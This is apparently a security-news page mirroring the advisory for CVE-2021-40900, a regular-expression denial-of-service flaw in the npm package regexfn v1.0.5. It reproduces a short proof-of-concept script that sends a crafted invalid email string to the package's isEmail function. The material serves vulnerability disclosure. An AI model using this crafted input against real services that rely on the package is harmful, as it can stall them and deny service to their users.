Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-40900: SaveResults/regexfn.js at main · yetingli/SaveResults

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in regexfn v1.0.5 when validating crafted invalid emails.

CVE
#vulnerability#dos#nodejs#js#git

Permalink

Cannot retrieve contributors at this time

/**

* regexfn@1.0.5

* Package Manager: npm

* Link to published package: https://github.com/Jeyaprakash1206/regexfn

* Link to GitHub repo: https://github.com/Jeyaprakash1206/regexfn

* Severity level: High

* Module Description: Functions available for Common RegEx Validations

* Additional Info: It allows cause a denial of service when validating crafted invalid emails.

* Contacted maintainer?: No

* Open issue?: No

*/

const regex = require(‘regexfn’);

console.log(regex.isEmail(“0000000000000000000000000000000000000000000000000000000000000000000000000000000000!”));

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda